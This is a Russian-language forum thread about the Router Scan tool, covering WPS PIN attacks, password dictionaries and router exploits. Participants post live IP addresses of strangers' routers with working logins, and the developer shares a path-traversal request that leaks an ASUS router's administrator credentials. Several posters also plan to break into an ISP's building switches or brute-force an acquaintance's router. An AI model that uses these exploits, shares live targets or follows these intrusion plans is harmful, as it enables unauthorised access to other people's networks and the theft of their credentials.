Просмотр полной версии : прога Router Scan
binarymaster
10.01.2018, 19:18
Какой-то глюк на стороне точки.
http://image.prntscr.com/image/pxmdXOtgTXehRfwaoJN09g.png
Заблокирован/не инициирован WPS. (это уже обсуждалось)
to binarymaster (https://forum.antichat.xyz/members/148032/).
А есть ли возможность подменить вывод в логе в связи с этой ошибкой?
А то, уже сотый раз по кругу с ней. (приелось)
Добавил вот такое описание к ошибке:
[-] Error: Enrollee/AP does not support PIN method.
Скорее всего она происходит с точками, которые работают только по PBC кнопке.
Scanner17
11.01.2018, 01:02
Или Поюзать Kali Linux там есть RouteSploit можно им попробовать.
Итак, попробовал RouterSploit 2.2.1 через единоразовую (до первой перезагрузки) установку в среду Live USB Kali Linux 2017.3. Проверил на уязвимость ко всем эксплойтам командой use scanners/autopwn: нашлось 9 эксплойтов, требующих дальнейшей проверки (часть из них относятся к теме авторизации), и 1 эксплойт, к которому, как сообщила программа, есть однозначная уязвимость роутера - "exploits/routers/3com/3cradsl72_info_disclosure" (также связанный с авторизацией, судя по данным из сети). Проверка работы всех 10 модулей не дала положительных результатов по разным причинам: часть из них не подошла к роутеру, часть просто выдала ошибку работы. Эксплойт, который был выделен как приоритетный (главный), не сработал до конца. Логи программы и свои вопросы по ним я разместил в профильной теме на этом форуме. Еще раз благодарю за рекомендацию!
Также дополню информацию о своих попытках авторизации через telnet. Попробовал программу X-Scan из пакета Intercepter-NG 1.0 по совету пользователя maus. Она в числе прочего сканирует телнет и подбирает к нему пароли из своей достаточно большой базы паролей. К сожалению, она также не смогла достать логин и пароль. Таким образом, полагаю, что на данный момент телнет мною проверен достаточно хорошо.
- попробуй это, мне помогло https://forum.antichat.ru/threads/b...ual-dlja-novichkov.436408/page-5#post-4041408
Благодарю за рекомендацию еще раз! Проверил свой модем программой X-Scan из пакета Intercepter-NG 1.0. Кстати, как я уже упоминал, она есть в сети и отдельно от него, например, на сайте разработчика - Xfocus. Настройки я оставил исходные, ничего не менял. К сожалению, ей тоже не удалось подобрать логин и пароль. Сама программа мне понравилась, буду ее применять и далее по необходимости. Спасибо!
VasiliyP
11.01.2018, 01:39
К сожалению, она также не смогла достать логин и пароль.
Если железка своя действительно, и нужно пароль выковырять - можно разобрать, подцепить кабель USBUART (стоит рублей 50). Попробовать через него в shell зайти (бывает что пароли от shell и вэб-админки - разные). Либо если загрузчик позволяет - до загрузки ядра прервать загрузку, и из загрузчика считать флешь память и таким образом вытащить конфиг. Еще можно флешь память выпаять, и на программаторе считать.
binarymaster
11.01.2018, 16:18
эксплойт на Cisco DDR2201v1
Было уже, вы же и постили.
https://forum.antichat.ru/posts/4111123
Было уже, вы же и постили.
https://forum.antichat.ru/posts/4111123
пардон..склероз видимо подбирается
Возможно, не очень хорошая хотелка, но тем ни менее.
Есть список маков, которые уязвимы к атаке пустым пином. Парсить мак тоже не думаю что сложно. Может быть сделать некую подсказку, когда нажимаешь "Obtain key with WPS" о том, что эта точка уязвима к пустому пину.
Вроде бы такое предупреждение, но оно кажется в окне подбора.
ps А еще было бы круто, если хранить этот список на 3WiFi и динамически подгружать
Triton_Mgn
12.01.2018, 14:29
Возможно, не очень хорошая хотелка, но тем ни менее.
Есть список маков, которые уязвимы к атаке пустым пином. Парсить мак тоже не думаю что сложно. Может быть сделать некую подсказку, когда нажимаешь "Obtain key with WPS" о том, что эта точка уязвима к пустому пину.
Вроде бы такое предупреждение, но оно кажется в окне подбора.
ps А еще было бы круто, если хранить этот список на 3WiFi и динамически подгружать
На 3 WIFI есть список устройств уязвимых к пустому пину.
inkugnito
12.01.2018, 14:50
Может быть сделать некую подсказку, когда нажимаешь "Obtain key with WPS" о том, что эта точка уязвима к пустому пину.
Вроде бы такое предупреждение, но оно кажется в окне подбора.
Ну так у известных маков склонных к пустому пину вполне показывает при вызове меню "WPS PIN Companion"
https://pp.userapi.com/c841329/v841329916/5cedf/nwGWoWUss1w.jpg
binarymaster
12.01.2018, 15:44
Может быть сделать некую подсказку, когда нажимаешь "Obtain key with WPS" о том, что эта точка уязвима к пустому пину.
На 3 WIFI есть список устройств уязвимых к пустому пину.
Ну так у известных маков склонных к пустому пину вполне показывает при вызове меню "WPS PIN Companion"
Да, и ещё ко всему этому, даже если OUI отсутствует в компаньоне и 3WiFi, модуль аудита выведет оповещение, если точка потенциально подвержена пустому пину.
Также напомню, что при открытом окне аудита (WPS) можно в таблице точек вызвать компаньон в оффлайн или онлайн режиме, и полученные пин коды будут занесены в список для проверки.
Интересно,где провайдеры настраивают фильтрацию пакетов в своих сетях.На концентраторах или подъездных свитчах.
Если например получить доступ к подъездному свитчу,посмотреть правила фильтрации,поменять их.Возможно ли таким образом подобраться ко всей локалке,или в лучшем случае только к хостам этого подъезда,дома.
Scanner17
12.01.2018, 17:33
Если железка своя действительно, и нужно пароль выковырять - можно разобрать, подцепить кабель USB<->UART (стоит рублей 50). Попробовать через него в shell зайти (бывает что пароли от shell и вэб-админки - разные). Либо если загрузчик позволяет - до загрузки ядра прервать загрузку, и из загрузчика считать флешь память и таким образом вытащить конфиг. Еще можно флешь память выпаять, и на программаторе считать.
Благодарю за рекомендации! Роутер не свой, принадлежит знакомому. В связи с этим предложенные варианты я применять здесь не решусь. В крайнем случае сделаю полный сброс настроек, если не смогу достать данные программным способом. За помощь большое спасибо, буду иметь ввиду эти варианты на будущее.
binarymaster
12.01.2018, 17:49
Интересно,где провайдеры настраивают фильтрацию пакетов в своих сетях.На концентраторах или подъездных свитчах.
Если например получить доступ к подъездному свитчу,посмотреть правила фильтрации,поменять их.Возможно ли таким образом подобраться ко всей локалке,или в лучшем случае только к хостам этого подъезда,дома.
Зависит от провайдера, думаю может быть по-разному (и так, и так).
Я пока не рисковал менять настройки свитчей в подъезде, максимум что пробовал - подключаться по Ethernet. Смотреть настройки фильтрации тогда не было необходимости.
alex2178
12.01.2018, 17:51
Интересно,где провайдеры настраивают фильтрацию пакетов в своих сетях.На концентраторах или подъездных свитчах.
Если например получить доступ к подъездному свитчу,посмотреть правила фильтрации,поменять их.Возможно ли таким образом подобраться ко всей локалке,или в лучшем случае только к хостам этого подъезда,дома.
Если каким то чудом это будет настроено на подъездной железке, Вам придется менять настройки и остальных подъездно-домовых свичей.
Для провайдера вижу самый простой вариант: VLAN и роутинг
Если каким то чудом это будет настроено на подъездной железке, Вам придется менять настройки и остальных подъездно-домовых свичей.
Для провайдера вижу самый простой вариант: VLAN и роутинг
Вот и я об этом же думаю.Провайдеру наверняка проще настроить это дело на более глобальном уровне,чем возиться с каждой домовой железкой.
Хотя известно,что и так тоже делают.
Может кто-нибудь знает логины и пассы которые используют провы от свитчей dlink.Пров МТС.Заводских,дефолтных у них вроде как не бывает.
binarymaster
12.01.2018, 19:21
Может кто-нибудь знает логины и пассы которые используют провы от свитчей dlink.Пров МТС.Заводских,дефолтных у них вроде как не бывает.
Router Scan'ом обнаруживаются? Как определяются?
Router Scan'ом обнаруживаются? Как определяются?
Нет,RS его не видит.Но узнать о его существовании можно нмапом,прощупаывая порты без пинга на адрес 10.90.90.90.Все порты filtered.
Так я и узнал,что это dlink.Этот дешман,почти все провы юзают.
как версией 2.60 из под ХР . по WPS найти пароль ? где посмотреть инструкцию ?
Ссылка на скачку битая
Если вы имеете в виду http://msk1.stascorp.com/routerscan/prerelease.7z
то почитайте начиная с этого поста: https://forum.antichat.ru/threads/proga-router-scan.398971/page-256#post-4156452
binarymaster
13.01.2018, 16:28
Ссылка на скачку битая
Провайдер/браузер у вас неправильный, всё работает.
как версией 2.60 из под ХР . по WPS найти пароль ? где посмотреть инструкцию ?
Точно также как в Win 7 и 10 (было бы странно, если по-другому). В первом посте темы всё есть.
Я про кнопку скачать в самой шапке поста вверху оранжевая
binarymaster
13.01.2018, 16:37
пререлиз скачался)
Ну я же говорил.
Я про кнопку скачать в самой шапке поста вверху оранжевая
А, это дело не мешало бы поправить.
Ну я же говорил.
А, это дело не мешало бы поправить.
и, кстати, архив-то не запаролен.. а висит баннер с паролем
binarymaster
13.01.2018, 16:41
и, кстати, архив-то не запаролен.. а висит баннер с паролем
Когда релиз будет, на оф. сайт будет залит запароленный архив.
А можно пару экспресс вопросов по сайту 3wifi?
1.добавлять в базу точку можно только через прогу Router Scan и никак иначе?
2.есть ли премодерация точек и как тогда узнать передана ли точная информация?
alex2178
13.01.2018, 17:23
... В первом посте темы всё есть.
Тоже интересует этот вопрос. Но в первом посте есть что, FAQ, инструкция по пользованию? Там эти нюансы не освещены, либо ткните пальцем если не трудно. В справке программы тоже нет толковой инструкции по вкладке "Wireless Networks". Как нибудь бы поподробнее хотелось алгоритм действий, а не только WPS помощник.
Слушайте, а как на смартфоне пользоваться сайтом 3wifi, там тупо никак не приблизишь и не увидишь данные ни по какой точке?
Pebenok70
13.01.2018, 18:46
а как на смартфоне пользоваться сайтом 3wifi
https://forum.antichat.ru/threads/3wifi-locator-klient-bazy-3wifi-dlja-mobilnyx-ustrojstv.433350/
binarymaster, Есть камера, авторизацию в таком виде показывает admin:Котлярова
Может адрес в личку кинуть, посмотрите?
georgiy8428
13.01.2018, 19:00
Объясните пожалуйста, как просканировать локальную сеть моего провайдера?.При сканировании,не находит роутеры моего дома...
binarymaster
13.01.2018, 19:19
1.добавлять в базу точку можно только через прогу Router Scan и никак иначе?
Можно ещё грузить отчёты Router Scan через сайт, если вы об этом.
2.есть ли премодерация точек и как тогда узнать передана ли точная информация?
Премодерации нет, есть постмодерация (периодическое вычищение мусора и дубликатов).
Тоже интересует этот вопрос. Но в первом посте есть что, FAQ, инструкция по пользованию? Там эти нюансы не освещены, либо ткните пальцем если не трудно. В справке программы тоже нет толковой инструкции по вкладке "Wireless Networks". Как нибудь бы поподробнее хотелось алгоритм действий, а не только WPS помощник.
Во вкладке всё что вам нужно есть в контекстном меню (правой кнопкой мыши).
В остальных случаях задавйте более конкретные вопросы.
Есть камера, авторизацию в таком виде показывает admin:Котлярова
Может адрес в личку кинуть, посмотрите?
UTF-8. Скидывайте.
Объясните пожалуйста, как просканировать локальную сеть моего провайдера?.При сканировании,не находит роутеры моего дома...
Сначала надо с уверенностью найти локальную сеть, и только после её сканировать.
binarymaster
13.01.2018, 23:14
Благодаря пользователю @Ossen (https://forum.antichat.xyz/members/265440/) сегодня удалось добавить полную поддержку для Sercomm WiFire S1010v1!
Уязвимостей в роутере найти правда не удалось, он по прежнему блокируется на 127 секунд при каждой неверной попытке авторизации.
любителям экспериментов. эксплойт на камеры C2S DVR (пардон если баян).
И эту тоже добавил.
Просьба не удалять пост, т.к. я указал ссылку на него в документации по эксплойтам.
Сначала надо с уверенностью найти локальную сеть, и только после её сканировать.
Каким образом?
binarymaster
13.01.2018, 23:30
Каким образом?
Nmap-ом, masscan-ом, ещё чем-нибудь быстрым (в теме было, поищите).
Уязвимостей в роутере найти правда не удалось, он по прежнему блокируется на 127 секунд при каждой неверной попытке авторизации.
Если что есть ещё второй экземпляр но он далековато от меня думаю на неделе будет прямой доступ к нему
binarymaster
13.01.2018, 23:36
Если что есть ещё второй экземпляр но он далековато от меня думаю на неделе будет прямой доступ к нему
Отлично! Будем надеяться, что отпарсит.
Pebenok70
15.01.2018, 20:16
TP-LINK Archer C7 2,4-5Hz RS парсит только мак и пин. Нужен?
binarymaster
15.01.2018, 20:17
TP-LINK Archer C7 2,4-5Hz RS парсит только мак и пин. Нужен?
Нужен.
Pebenok70
15.01.2018, 20:35
Нужен.
В личку скинул.
Ещё AirStation адрес скинул, на всякий случай. порт 8080.
Sercomm WiFire S1010v1 не парсит. К сожалению по внешнему IP и даже внутри сети он не сканируется. Скан проходит только если подключиться к нему.
popovdk01
16.01.2018, 18:58
отлично надеюсь отпарсит
Sercomm WiFire S1010v1 не парсит
он парсит но результат будет если пользователь сменил логин пароль на вход в админку
binarymaster
16.01.2018, 19:58
Sercomm WiFire S1010v1 не парсит.
Скан проходит только если подключиться к нему.
Парсит же!
У меня такой же с прошивкой MTS,будучи подключенным к нему отпарсились только логин,пасс и модель.
Можно слепок веб интерфейса? И отладочный дамп RS тоже пригодился бы.
Интересно,где провайдеры настраивают фильтрацию пакетов в своих сетях.На концентраторах или подъездных свитчах.
Если например получить доступ к подъездному свитчу,посмотреть правила фильтрации,поменять их.Возможно ли таким образом подобраться ко всей локалке,или в лучшем случае только к хостам этого подъезда,дома.
Если решитесь на эксперимент, данные не прячьте в карман! Это и в правду интересно, особенно с dom-ru и rt.
Если решитесь на эксперимент, данные не прячьте в карман! Это и в правду интересно, особенно с dom-ru и rt.
Завтра сгоняю на разведку.Знакомый мне сказал,что у них в подъезде,пьяные малолетки раскурочили ящик,в котором стоит свитч.Вот я и решил попробовать.
binarymaster
17.01.2018, 14:18
Кое как удалось подключиться.)
Отладочный дамп http://rgho.st/74B9hWFH7
Прошивку,увф не слить.
У вас старая сборка librouter.dll, нужно обновить.
Завтра сгоняю на разведку.Знакомый мне сказал,что у них в подъезде,пьяные малолетки раскурочили ящик,в котором стоит свитч.Вот я и решил попробовать.
Сгонял сегодня посмотреть как там да чё.Оказалось,разворотили там щит не со свитчем,а с питанием для свитча.(он отдельно смонтирован)Ну курочить второй щит,я конечно же не стал.
У вас старая сборка librouter.dll, нужно обновить.
Перезалил.http://rgho.st/7VMZwGkDN
binarymaster
17.01.2018, 16:13
Перезалил.http://rgho.st/7VMZwGkDN
1. Не нужно сканировать одно устройство с двумя портами сразу (80 и 443), добавьте одно в исключения (иначе конфликтуют)
2. В логах не увидел успешной авторизации, пароль к админке известен?
1. Не нужно сканировать одно устройство с двумя портами сразу (80 и 443), добавьте одно в исключения (иначе конфликтуют)
2. В логах не увидел успешной авторизации, пароль к админке известен?
Дубль три. http://rgho.st/7PwYSgd6v
binarymaster
18.01.2018, 14:50
Дубль три. http://rgho.st/7PwYSgd6v
Нет там успешной авторизации.
Потребуется записать сессию Charles с первичной загрузкой страницы и (успешной) авторизацией, может быть у этого интерфейса другой способ аутентификации.
Нет там успешной авторизации.
Потребуется записать сессию Charles с первичной загрузкой страницы и (успешной) авторизацией, может быть у этого интерфейса другой способ аутентификации.
Я извиняюсь,за свою невнимательность.Успешной авторизации там действительно нет,и не было.Сам незнаю,с чего мне в башку такое пришло.
Сессию попробую записать.
binarymaster
18.01.2018, 15:23
Я извиняюсь,за свою невнимательность.Успешной авторизации там действительно нет,и не было.Сам незнаю,с чего мне в башку такое пришло.
Сессию попробую записать.
Всякое бывает, главное пришли к консенсусу.
Hi,
Why sometimes RS show password on Asus RT-XXX v 2.0 device.. and later, in other scan, same ip device, show only ESSID ?
binarymaster
19.01.2018, 11:29
Why sometimes RS show password on Asus RT-XXX v 2.0 device..
One exploit can obtain web interface password.
and later, in other scan, same ip device, show only ESSID ?
Another exploit can only obtain BSSID and ESSID.
Whether one of these exploits work depends on the router firmware.
how get to work both script ? same fimware, same ip only scan later, but show only essid, no password, never.
binarymaster
19.01.2018, 12:12
how get to work both script ?
Install the oldest and vulnerable firmware to the router.
Felis-Sapiens
19.01.2018, 14:05
how get to work both script ? same fimware, same ip only scan later, but show only essid, no password, never.
From vulnerability description:
... will be treated as signed-in if any other administrator session is active.
Можно слепок веб интерфейса?
"Пользуясь случаем, хочу." (c)
Хочу поделится для всех интересующихся, портабельной версией Charles 4.0, описание в архиве:
https://yadi.sk/d/oCqBP7os3Rbdch
binarymaster
20.01.2018, 16:57
еще один свежий эксплойт на Master IP CAM
Этот уже добавлен.
bynarimaster-у
Опечатка.
Опечатка.
исправил
Этот уже добавлен.
жаль, что опоздал. а я как-раз шодан-дорк нашел RT_IPC
пост с эксплойтом не удаляю. может кому интересно будет самому поиграться...
п.с. интересная статья на этот счет
http://syrion.me/blog/master-ipcam/
Можно ли от сканировать майнеры Bitmain Antminer, попадалось кому то?
Охота на Буратин? Вы уже провтыкали вспышку. Если только ты не падальщик, который подъедает последних кретинов.
В поле чудес, на планете дураков.. дураков всё меньше. (и это радует, по-настоящему! )
Я задал вопрос, а не делему дураков, форум для того и форум, википедию вам в помощь, Люди воспитанные на сказках про Иванушку-дурачка и Соловья-разбойника не могут быть иными как генетическими склонными к преступлениям и недоразвитыми мозгами,которых следует изолировать от нормального сообщества в целях локализации чумы...
Я прекрасно знаком с вашей сказочной демагогией(вы напрасно думаете что я некомпетентен), мне просто интересно до какого уровня увещевания вы зайдёте.
Продолжайте. Но только последовательно, не перескакивая на сказки.
Я повторюсь, можно ли от сканировать или же нет, а если это уже где то выше описано то ткните. вот и все. Спасибо ( а на сказки перешли вы (буратино) как и на личности)
Само собой можно, и даже автоматизировать этот процесс. Обращайтесь к специалистам из даркнета, которые к слову сказать, в вас не нуждаются.
ответить можно было одним постом, чем вы не сПамперс? Ликуете
Router Scan инструкции https://hackware.ru/?p=4321
Может кому-то нужно, сделал огромный список паролей для RouterScan, думаю, он содержит почти все дефолтные и часто используемые пароли в сетевых устройствах (роутерах, камерах т.д.), повторов в списке нет, и везде по прописывал , для пустых полей, чтобы RS понимал. Только если будете использовать такие больше словари, вы таймаут в RS побольше ставьте
http://zalil.su/4871484
Ну тогда
А вот это в правду не видал, высшая сатира специалистов над попсой. Супер. Спасибо!
Ржал как в детстве.
Triton_Mgn
21.01.2018, 03:32
Специально для темы RS)
Люди воспитанные на сказках про Иванушку-дурачка и Соловья-разбойника не могут быть иными как генетическими склонными к преступлениям и недоразвитыми мозгами,которых следует изолировать от нормального сообщества в целях локализации чумы...
не в тему будь сказано, как раз наоборот. люди воспитанные на сказках про соловья разбойника и иванушку дурачка склонны к творческому мышлению. а вот люди воспитанные на покемонах, халках, бетменах и манге точно "склонны к преступлениям и недоразвитым мозгам". никого лично не имел ввиду. просто уточнение истины ради...
Может кому-то нужно, сделал огромный список паролей для RouterScan, думаю, он содержит почти все дефолтные и часто используемые пароли в сетевых устройствах (роутерах, камерах т.д.), повторов в списке нет, и везде по прописывал <empty>, для пустых полей, чтобы RS понимал. Только если будете использовать такие больше словари, вы таймаут в RS побольше ставьте
не стоит заморачиваться. на этой ветке форума ранее уже обсуждался вопрос больших словарей по дефолту. пройдитесь по форуму. бесполезное занятие. таймаут не поможет. и в частности, большинство роутеров просто залочится (как одна из причин). для отсутствующих в списке паролей рекомендуется использовать функцию юс крединтиалс. хотя в принципе творческий подход к делу всегда заслуживает уважения...
binarymaster
21.01.2018, 19:37
https://miloserdov.org/?p=712
Новая статья про Router Scan v2.60 вышла, хорошо раскрывает потенциал новых фич, понравилась.
https://miloserdov.org/?p=712
Новая статья про Router Scan v2.60 вышла, хорошо раскрывает потенциал новых фич, понравилась.
тут та же статья
Router Scan инструкции https://hackware.ru/?p=4321
только на русском. алексей дублирует свои статьи на английском для западных читателей. оно и правильно....нужно развиваться в ширь, не только в высоту
binarymaster
21.01.2018, 20:01
та же что и тут только на английском.
На экспорт.
binarymaster
21.01.2018, 22:10
https://image.prntscr.com/image/ktdKK4gYTDOGsEKOGD4a6A.png
@sha9 aka Dik Lee (https://forum.antichat.xyz/members/272885/) зачем пользователей в заблуждение вводишь?
Сам то не разобрался... отправляйся читать документацию...
(по посту - ответил на том форуме)
@sha9 aka Dik Lee (https://forum.antichat.xyz/members/272885/) зачем пользователей в заблуждение вводишь?
Сам то не разобрался... отправляйся читать документацию...
(по посту - ответил на том форуме)
шифу, документацию я читал. но в памяти живут ваши слова по поводу дополнительных модулей, высказанных вами на форуме ранее. к сожалению еще их не нашел. тогда стоял вопрос о добавлении эксплойтов в майадмин. и вы объяснили, что они (модули) есть, но не работают. может что не так понял. тогда извините... пост на том форуме удаляю, дабы не вводить в заблуждение
binarymaster
21.01.2018, 22:43
пост на том форуме удаляю, дабы не вводить в заблуждение
Не нужно, пусть останется для истории (я своего не удалю).
я своего не удалю
я и не настаивал это дело чисто субъективное, зависящее от многих факторов
хотя, пусть с модулями я накосячил (что-то недопонял, а пост найти не могу,чтобы перечитать и понять где ошибся.видимо он ушел при глюке форума), а вот по поводу расширения словарей вы меня не поняли. я говорил о расширении словарей до размера радужных таблиц, а вы в том посте говорили о доработке под провайдера. это несколько разные вещи.
п.с. я когда начал знакомиться с программой, тоже нарасширял так, что потом только с вашей помощью смог разобраться в чем проблема. так-что расширение проведено через личный опыт т.с.
словарей до размера радужных
я уже сам запутался пример старые версии RS эти словари (что сам собирал) проходят. в новых что они есть что их нету нужная пара логин пароль присутствуют в словарях но увы
А что с IPv6. Будет когда нибудь поддержка данных диапазонов.???
binarymaster
24.01.2018, 15:51
А что с IPv6. Будет когда нибудь поддержка данных диапазонов.???
Как только случится генеральный рефакторинг (примерно) тысячи строк кода...
Pebenok70
25.01.2018, 22:03
В поддерживаемых есть Cisco Linksys WRT320N. А WRT300N не отпарсился у меня полностью. RS крайний.
binarymaster
25.01.2018, 23:09
В поддерживаемых есть Cisco Linksys WRT320N. А WRT300N не отпарсился у меня полностью. RS крайний.
Скорее всего у них разная структура веб интерфейсов, поэтому так.
Pebenok70
25.01.2018, 23:16
Скорее всего у них разная структура веб интерфейсов, поэтому так.
Пока живой. Может посмотрите? 95.106.143.29:80 а:а
Pebenok70
27.01.2018, 13:02
binarymaster, ASUS DSL-N14U ADSL BC:EE:7B:60:BD:08 пока на 109.184.42.125 авторизация зациклилась, отпарсились мак и пин.
ekaterina333
27.01.2018, 13:07
давно пользуюсь программой все отлично работает если руки с нужного места растут
binarymaster
27.01.2018, 15:10
binarymaster, ASUS DSL-N14U ADSL BC:EE:7B:60:BD:08 пока на 109.184.42.125 авторизация зациклилась, отпарсились мак и пин.
Который раз мне повторять, что в RS есть эксплойт, получающий только BSSID и ESSID?
народ а если все время ев любую сеть выскакивает
Associating with AP...
[-] Connection failed.
при подборе WPS. на любую сеть.
делаю все по инструкции. впс сетей не заблочен, верчм впс 1.0
а при попытке брутить словарем любую сеть
Trying key "12345678"...
[-] Connection failed.
Trying key "12345678"...
[-] Connection failed.
binarymaster
27.01.2018, 15:39
народ а если все время ев любую сеть выскакивает
Associating with AP...
[-] Connection failed.
при подборе WPS. на любую сеть.
делаю все по инструкции. впс сетей не заблочен, верчм впс 1.0
а при попытке брутить словарем любую сеть
Trying key "12345678"...
[-] Connection failed.
Trying key "12345678"...
[-] Connection failed.
Обновил RS, попробуйте ещё раз. Если не сработает, скиньте строки из лога RouterScan.log
У меня подобное было после обновления драйвера wifi адаптера. После отката драйвера все заработало.
Pebenok70
27.01.2018, 15:54
Который раз мне повторять, что в RS есть эксплойт, получающий только BSSID и ESSID?
В данном случае я имел виду, что в колонке Authorization отображается строчка: qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop qwertyuiopqwertyuiopqwertyui:123456789012345678901 23456789012345678901234567890123456789012345678901 23456789012345678901234567890123456789012345678901 2345678
binarymaster
27.01.2018, 16:07
В данном случае я имел виду, что в колонке Authorization отображается длинная строчка...
Нужно было это сразу обозначить, чтобы я не прошёл мимо.
binarymaster
27.01.2018, 16:20
109.184.42.125
https://image.prntscr.com/image/vU07FrwhQ3uzodWFEKC18w.png
Чей айпи, кто зашёл? Выйдите, мешаете исправлять.
Обновил RS, попробуйте ещё раз. Если не сработает, скиньте строки из лога RouterScan.log
2018-01-27 19-14-47 | Initializing librouter...
2018-01-27 19-14-47 | Getting modules...
2018-01-27 19-14-47 | Loading settings...
2018-01-27 19-14-47 | Loading pairs...
2018-01-27 19-14-47 | Loading filter rules...
2018-01-27 19-14-47 | *** LoadFilterRules: No rules loaded
2018-01-27 19-14-47 | Loading IP exclusions...
2018-01-27 19-14-54 | Setting up user interface...
2018-01-27 19-14-54 | Loading port list...
2018-01-27 19-14-54 | Loading IP range list...
2018-01-27 19-14-54 | Initialization done
2018-01-27 19-17-22 | WlanConnect failed: 0
2018-01-27 19-17-25 | WlanConnect failed: 0
2018-01-27 19-17-29 | WlanConnect failed: 0
2018-01-27 19-18-27 | WlanConnect failed: 0
2018-01-27 19-18-28 | WlanConnect failed: 0
2018-01-27 19-18-56 | WlanConnect failed: 0
2018-01-27 19-18-58 | WlanConnect failed: 0
простите что не под спойлер. не знаю как (((
ekaterina333
27.01.2018, 16:24
https://image.prntscr.com/image/vU07FrwhQ3uzodWFEKC18w.png
Чей айпи, кто зашёл? Выйдите, мешаете исправлять.
а вышвырнуть не как ?)
binarymaster
27.01.2018, 16:26
а вышвырнуть не как ?)
Нет способа, иначе бы я не просил.
binarymaster
27.01.2018, 16:37
WlanConnect failed: 0
Кажется, я неправильно сделал вывод кода ошибки, ещё раз пожалуйста (поправил).
В данном случае я имел виду, что в колонке Authorization отображается строчка: qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop qwertyuiopqwertyuiopqwertyui:123456789012345678901 23456789012345678901234567890123456789012345678901 23456789012345678901234567890123456789012345678901 2345678
В общем, исправил как смог. У этого роутера глючный веб интерфейс.
Pebenok70
27.01.2018, 17:14
В общем, исправил как смог. У этого роутера глючный веб интерфейс.
Длинная строчка так и осталась. Ну и ладно. Второй раз за всё время такое замечаю. Спасибо!
У меня ещё есть работа на будущее для вас. Новые никуда не деваются.
Кажется, я неправильно сделал вывод кода ошибки, ещё раз пожалуйста (поправил).
теперь при атаке по впс пишет мол дрова на ройтер обнови. tp link 722n . а брут все время пытается подобрать один и тот же пароль из словаря. в общем попробую позже на втором ноуте проверить чуть позже и отпишусь
уважаемый binarymaster... тут сегодня нарвался на один эксплойт на AsusWRT Router от 22/01/2018. по-моему его можно реализовать в роутерскане (если он еще не реализован). посмотрите, если не сложно.
https://cxsecurity.com/issue/WLB-2018010263
сам разобраться не могу (стыдно признаться-не хватает знаний. но работаем над самообразованием ).
binarymaster
27.01.2018, 23:20
тут сегодня нарвался на один эксплойт на AsusWRT Router от 22/01/2018. по-моему его можно реализовать в роутерскане (если он еще не реализован). посмотрите, если не сложно.
https://cxsecurity.com/issue/WLB-2018010263
Мы уже обсуждали этот эксплойт в чате телеграм, его добавить не получится, потому что он требует смены настроек на роутере (смены пароля администратора).
Если вы найдёте способ провести авторизацию не меняя пароля, будет вам хвала и честь, и эксплойт будет добавлен.
Если вы найдёте способ провести авторизацию не меняя пароля, будет вам хвала и честь, и эксплойт будет добавлен.
ну значит чести и хвалы мне еще долго не дождаться. я же сразу предупредил
стыдно признаться-не хватает знаний.
иначе давно-бы уже в помощники набивался
на 3 wifi только у меня карта не открывается??
Pebenok70
28.01.2018, 12:58
на 3 wifi только у меня карта не открывается??
Возможно. У меня всё открывается. Хотя этот вопрос не по RS.
У меня тоже есть вопрос, связанный с геолокацией. Если стоит Яндекс, то координаты в RS правильные при поиске, если находятся. Но гугл постоянно отображает мои координаты, на всех маках. У всех так?
binarymaster
28.01.2018, 14:50
Но гугл постоянно отображает мои координаты, на всех маках. У всех так?
Да, у всех, это известный баг, я уже говорил что планирую удалить его из RS.
Кажется, я неправильно сделал вывод кода ошибки, ещё раз пожалуйста (поправил).
в общем я так понял что то с адаптером. рамс какой то. со встроеного в ноут ломает. а адаптер tp link 722n ни в какую. дрова переустанавливать пробовал не помогло. проверял на 2х ноутах. нужен будет лог, дай знать, скину
Triton_Mgn
28.01.2018, 19:41
Думаю лог будет не нужен, т.к разбираться с работой адаптера 722n и PCAP не представляется возможным, более того в теме адаптеров, уже озвучивались версии такого адаптера , которые не способны работать в режиме монитора. https://test.antichat.xyz/threads/spisok-wi-fi-adapterov-prigodnyx-dlja-wardrivinga.57249/
Думаю лог будет не нужен, т.к разбираться с работой адаптера 722n и PCAP не представляется возможным, более того в теме адаптеров, уже озвучивались версии такого адаптера , которые не способны работать в режиме монитора. https://test.antichat.xyz/threads/spisok-wi-fi-adapterov-prigodnyx-dlja-wardrivinga.57249/
прикол в том что 2-3 дня назад у дрцга на другом ноуте с этого же адаптера и теми же дровами все работало исправно. завтра к нему схожу проверю. если там все норм будет значит проблема в системи. хоть винда стоит на обоих с одной флэхи. ладно буду решать с адаптером. это в любом случае не твоя проблема (программы)
freeonix87
30.01.2018, 12:43
Можно добавить поддержку: ASUS RT-N11P, ASUS RT-N12 Rev.D1, ASUS RT-N12VP, ASUS RT-N10 Rev.B1, ASUS RT-N12E, ASUS RT-N14U
и DD-WRT (name: DD-WRT, model: Dlink-DIR300 rev b)
2.95.240.177
91.135.159.77:8080
80.65.20.13
Pebenok70
30.01.2018, 13:22
Продолжение ASUS. Есть DSL-N10 и DSL-N12U. А DSL-N11 нет в поддерживаемых. Адресок сюда дать, или в личку, чтоб дожил?
binarymaster
30.01.2018, 16:08
Можно добавить поддержку
Вы сначала с документацией ознакомьтесь, посмотрите какие модели уже добавлены, прежде чем писать сюда.
Продолжение ASUS. Есть DSL-N10 и DSL-N12U. А DSL-N11 нет в поддерживаемых. Адресок сюда дать, или в личку, чтоб дожил?
Скидывайте, можно сюда.
Pebenok70
30.01.2018, 16:09
Скидывайте, можно сюда.
188.18.94.62:8080 admin:admin
binarymaster
30.01.2018, 19:30
188.18.94.62:8080 admin:admin
Нашёл уязвимость!
GET /images/../cgi-bin/backup.bin HTTP/1.0
Даёт логин + пароль администратора.
на 3 wifi только у меня карта не открывается??
провайдер "гранд телеком" блокировал карту, включил vpn и всё норм.
провайдер "гранд телеком" блокировал карту,
Закрыть провайдера "гранд телеком"
Версия для Android планируется?
binarymaster
30.01.2018, 23:43
Версия для Android планируется?
Шапку (первый пост) темы внимательно прочитайте.
megakill
31.01.2018, 07:16
Нашёл уязвимость!
GET /images/../cgi-bin/backup.bin HTTP/1.0
Даёт логин + пароль администратора.
Дорогой друг, каким софтом находишь уязвимости роутеров?
binarymaster
31.01.2018, 11:24
Дорогой друг, каким софтом находишь уязвимости роутеров?
Использую Charles.
Spetsnaz
31.01.2018, 12:54
Когда создатель этой программы допишет парс BSSID и пин - будет намного интересней.
